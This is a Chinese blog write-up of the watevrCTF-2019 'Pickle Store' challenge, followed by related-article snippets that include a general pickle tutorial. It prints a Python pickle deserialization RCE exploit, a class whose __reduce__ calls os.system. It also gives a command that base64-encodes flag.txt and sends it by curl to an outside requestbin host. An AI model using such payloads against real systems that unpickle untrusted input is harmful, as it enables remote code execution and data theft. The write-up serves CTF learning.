[watevrCTF-2019]Pickle Store pickle序列化漏洞~~

最新推荐文章于 2023-11-08 21:27:38 发布
最新推荐文章于 2023-11-08 21:27:38 发布
阅读量1.7k 收藏
点赞数
分类专栏: BUUCTF刷题记录
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/a3320315/article/details/104277233
版权

题目介绍

在这里插入图片描述要有1000美元买flag,然后我们查看header,扫目录之类的操作,最后在cookie中发现问题~~

gAN9cQAoWAUAAABtb25leXEBTfQBWAcAAABoaXN0b3J5cQJdcQNYEAAAAGFudGlfdGFtcGVyX2htYWNxBFggAAAAYWExYmE0ZGU1NTA0OGNmMjBlMGE3YTYzYjdmOGViNjJxBXUu

先试试base64解码~~
在这里插入图片描述可以看见有些关键词还是很明显的,要么是经过某种加密,或者处理~~
根据题目pickle的提示,我们用python的pickle库去loads一下~~
在这里插入图片描述我开始以为是要伪造cookie,让money变成1000以上就能购买flag了,但是pickle有key加密处理,这种加密方式为hmac,尝试过爆破,无果~~
最后在网上看见了pickle的反序列化的漏洞~~

exp

import _pickle as cPickle
import sys
import base64

COMMAND = sys.argv[1]

class PickleRce(object):
    def __reduce__(self):
        import os
        return (os.system,(COMMAND,))

print base64.b64encode(cPickle.dumps(PickleRce()))

这段代码就是我们的exp
执行方式为

python3 script.py 命令

windows和linux的运行方式不一样,由于服务器实在linux上,所以我们也必须在linux上运行这段代码~~
然后替换cookie,虽然会报500错误,但是命令还是执行了,我们找个vps,直接把数据带出来就行了

python3 posix.py "curl http://http.requestbin.buuoj.cn/1fl5yzt1?a=\`cat flag.txt |base64\`"

相关总结

python序列化还有一个库叫做marshal,也存在相关漏洞~~
有时后pickle时,题目会以黑名单限制,这个时候我们可以用map绕过~~

参考链接

简书
tr1ple师傅
hmac爆破

HyyMbb
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF题型 Python中pickle序列化进阶利用&例题&opache绕过
m0_61408947的博客
04-28 444
V操作码是可以识别\u (unicode编码绕过)无R,i,o os 可过 + 关键词过滤。特别是命令有特殊功能字符。无R,i,o os可过。
CTF刷题平台合集防丢
Ethereal的博客
10-24 1133
之后传题解
第一次尝试CTF_bugku-江湖魔头
热门推荐
qq_25899635的博客
06-22 2万+
.   作为一个野路子出身,有时候真的不是知道怎么学习。听安全圈的朋友说挑战CTF试题是个不错的选择,于是乎就尝试了一下,感觉还是很精彩的,这里分享一个比较有意思的题目。   这里附上链接:http://123.206.31.85:1616/   “进入游戏”后看到了一张个人感觉画风很不错的江湖英雄人物,随手还搜索了一下: 在右侧我看到了我当前游戏人物的属性值列表: 习惯性的view-sour...
记录一次校园CTF--wp
最新发布
qq_30528603的博客
11-08 231
那么利用就简单了,我们只需要想办法让金币大于9999999就能造成栈溢出并成功构造一次ret2text,现在关键问题是如何让金币达到9999999呢,在题目游戏中选项3捡垃圾一次是10块钱,不得不说出题人很会玩。这个v6参数就是我们输入想要输入的选项,而Vipfun这一后门函数的参数v8就是我们的金币数,一开始我懵了好久。1.做了一题很简单元神启动,题目中描述1+1等于几,我直接F12查看网页源代码得到出题人的1+1等于10,即可得到flags.四,是一个UAF堆,打本地的时候想岔了没做出来,晚点在复盘。
buuctf [极客大挑战 2019]BuyFlag
qq_52671379的博客
05-09 1333
buuctf [极客大挑战 2019]BuyFlag
某单位2021年CTF初赛Writeup(部分)
更多知识欢迎访问我的博客园:https://www.cnblogs.com/2ha0yuk7on/
11-08 4604
Web Web1 当时没截图,找了别人拍的照贴一下。。。 是一道简单题,不过考的知识点蛮多的。 Referer绕过、User-Agent绕过、XFF绕过之后,进行代码审计 这里的知识点: 使用科学计数法绕过取值大于1 intval() 不能用于 object,否则会产生 E_NOTICE 错误并返回 1 使用数组绕过类型判断 <?php echo intval(42); // 42 echo intval(4.2);
Python pickle模块实现对象序列化
12-31
这篇文章主要介绍了Python pickle模块实现对象序列化,文中通过示例代码介绍的非常详细,对大家的学习或者工作具有一定的参考学习价值,需要的朋友可以参考下 作用 对Python对象进行序列化,便于存储和传输 Python...
Python3.5 Json与pickle实现数据序列化与反序列化操作示例
09-19
这里主要讨论两种常见的序列化库:Json和pickle。 1. Json: Json (JavaScript Object Notation) 是一种轻量级的数据交换格式,易于人阅读和编写,同时也易于机器解析和生成。在Python3.5中,可以使用`json`模块来...
Python使用pickle进行序列化和反序列化的示例代码
09-24
Python的pickle库是一个强大的工具,用于对象的序列化和反序列化序列化是将Python对象转换为字节流的过程,而反序列化则是将字节流恢复为原来的Python对象。这个过程允许我们将复杂的对象结构保存到文件或通过网络...
Python序列化与反序列化pickle用法实例
09-18
在Python中,`pickle`模块提供了一个强大的序列化和反序列化的实现。 序列化是将Python对象转化为字节流的过程。在这个过程中,`pickle`模块会将对象的所有属性和结构转换为二进制数据。在上述例子中,`Bird`类的...
[watevrCTF-2019]Supercalc
SopRomeo的博客
10-16 751
看到这种题很容易想到是模板注入 直接测试 有过滤,之前刷过flasksession伪造的题目 抓包查看cookie 可能是JWT伪造 先去github找个脚本解一下cookie 脚本 可以发现这里面的cookie刚好就是我们刚刚提交的东西 题目意思够清楚了,接着就是如何伪造session了 而想要伪造必须要拿到secrect_key,而由于直接输入{{}}不可行。那就看他有没有地方可以报错 可以发现1/0报错了 可是由于输入{{}}不可以,学到个新思路,用注释来绕过 可以发现通过注释我们可以直接.
[watevrCTF 2019]Timeout 题解
于高山之巅,方见大河奔涌;于群峰之上,更觉长风浩荡。
02-11 6020
buuctf-[watevrCTF 2019]Timeout 题解
[watevrCTF 2019]Timeout
m0_46296905的博客
04-22 647
题目:[watevrCTF 2019]Timeout 64位无壳 .com文件?拖到ida64看看 反汇编不出来。 但拖入ida64时显示了elf,去掉后缀改成elf应该就可以正常显示汇编代码了。 查看main函数代码如下: int __cdecl main(int argc, const char **argv, const char **envp) { signal(14, sig); alarm(1u); delay(6000000LL); can_continue = 1337
buuctf-[极客大挑战 2019]BuyFlag-个人理解
sunquan705的博客
11-11 1366
buuctf-[极客大挑战 2019]BuyFlag-个人理解-有错的还请师傅们指出
[buuctf.reverse] 100_[watevrCTF 2019]Repyc
weixin_52640415的博客
05-20 298
python 虚拟机
【re】 watevrCTF2019_Repyc
Nothing
12-16 544
这题给了个pyc。先用uncompyle反编译成py。 uncompyle6 3nohtyp.pyc >>sss.py 打开,然后惊了。 # uncompyle6 version 3.6.0 # Python bytecode 3.6 (3379) # Decompiled from: Python 3.8.0 (default, Oct 23 2019, 18:51:26) # ...
BUUCTF [watevrCTF-2019] Supercalc
Senimo
12-20 818
BUUCTF [watevrCTF-2019] Supercalc 考点: session伪造 通过session拼接语句 {{config}}获取SECRET_KEY的值 启动环境: 是一个类似计算机的功能,又一个输入,尝试输入1+1: 得到计算结果,开始想到的是SQL注入,简单测试了几个payload,都没太有反应,继续对题目进行信息收集 在HTTP请求中,查看到Cookie信息: 可以获取到session: session=eyJoaXN0b3J5IjpbeyJjb2RlIjoiMSArI
python pickle protocol_Python序列化pickle模块使用详解
05-13
Python的pickle模块是用来实现序列化的,即将Python中的对象转换成字节流,方便存储和传输。pickle模块支持多种协议,其中协议0是最早的版本,协议1和协议2是Pyhton2中引入的,协议3是Python3.0中引入的,协议4是Python3.4中引入的,每个协议都有其特点和适用范围。 下面我们来详细了解一下pickle模块的使用方法和各个协议的特点。 ## 基本用法 pickle模块提供了dumps、dump、loads和load四个函数,分别用来进行序列化和反序列化操作。其中dumps和loads函数可以直接将对象转换成字节流或将字节流转换成对象,而dump和load函数则可以将对象序列化到文件或从文件中反序列化对象。 ### 序列化 将Python对象转换成字节流的过程称为序列化,可以使用dumps函数实现: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} bytes_data = pickle.dumps(data) print(bytes_data) ``` 输出结果为: ``` b'\x80\x04\x95\x17\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8c\x03Tom\x94\x8c\x03age\x94K\x12\x8c\x06gender\x94\x8c\x04male\x94u.' ``` 可以看到,data字典被转换成了一串二进制的字节流。 ### 反序列化 将字节流转换成Python对象的过程称为反序列化,可以使用loads函数实现: ```python import pickle bytes_data = b'\x80\x04\x95\x17\x00\x00\x00\x00\x00\x00\x00}\x94(\x8c\x04name\x94\x8c\x03Tom\x94\x8c\x03age\x94K\x12\x8c\x06gender\x94\x8c\x04male\x94u.' data = pickle.loads(bytes_data) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ### 文件操作 除了使用dumps和loads函数进行序列化和反序列化操作外,pickle模块还提供了dump和load函数用于将对象序列化到文件或从文件中反序列化对象。 将对象序列化到文件: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f) ``` 从文件中反序列化对象: ```python import pickle with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` ## 协议0 协议0是最早的版本,它使用ASCII码来表示序列化后的对象,因此序列化后的数据比较大。使用协议0时,可以指定文件打开模式为't',表示以文本模式打开文件: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wt') as f: pickle.dump(data, f, protocol=0) with open('data.pkl', 'rt') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'age': 18, 'gender': 'male', 'name': 'Tom'} ``` ## 协议1 协议1和协议2是Python2中引入的,它们使用更紧凑的二进制格式表示序列化后的对象。协议1可以指定文件打开模式为'wb',表示以二进制模式打开文件: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f, protocol=1) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 协议2 协议2是协议1的改进版本,它支持新的对象类型,如集合、字典等。在Python2中,协议2是默认使用的协议,如果不指定协议号,则使用协议2。 在Python3中,pickle模块默认使用协议3,但仍然可以使用协议2: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f, protocol=2) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 协议3 协议3是Python3.0中引入的,它支持更多的对象类型,如bytes、bytearray、set等。在Python3中,协议3是默认使用的协议,因此可以省略protocol参数: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'wb') as f: pickle.dump(data, f) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 协议4 协议4是Python3.4中引入的,它支持更多的对象类型,如memoryview、tuple等。协议4还支持从流中读取指定长度的数据,从而避免了一次性读取太多数据导致内存溢出的问题。 使用协议4时,需要将文件打开模式指定为'xb',表示以二进制模式打开文件,并且不能使用文本模式: ```python import pickle data = {'name': 'Tom', 'age': 18, 'gender': 'male'} with open('data.pkl', 'xb') as f: pickle.dump(data, f, protocol=4) with open('data.pkl', 'rb') as f: data = pickle.load(f) print(data) ``` 输出结果为: ``` {'name': 'Tom', 'age': 18, 'gender': 'male'} ``` ## 注意事项 在使用pickle模块时,需要注意以下几点: - 序列化和反序列化的对象必须是可序列化的,即不能包含不能序列化的对象。 - 序列化和反序列化的对象必须是相同的类型,否则可能会出现错误。 - 序列化和反序列化的对象必须是可信的,否则可能会被注入恶意代码。 - 不同协议之间的兼容性不同,不同协议之间的序列化和反序列化操作不一定是互逆的。因此,在使用不同协议时,需要注意协议号的兼容性和相应的操作。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值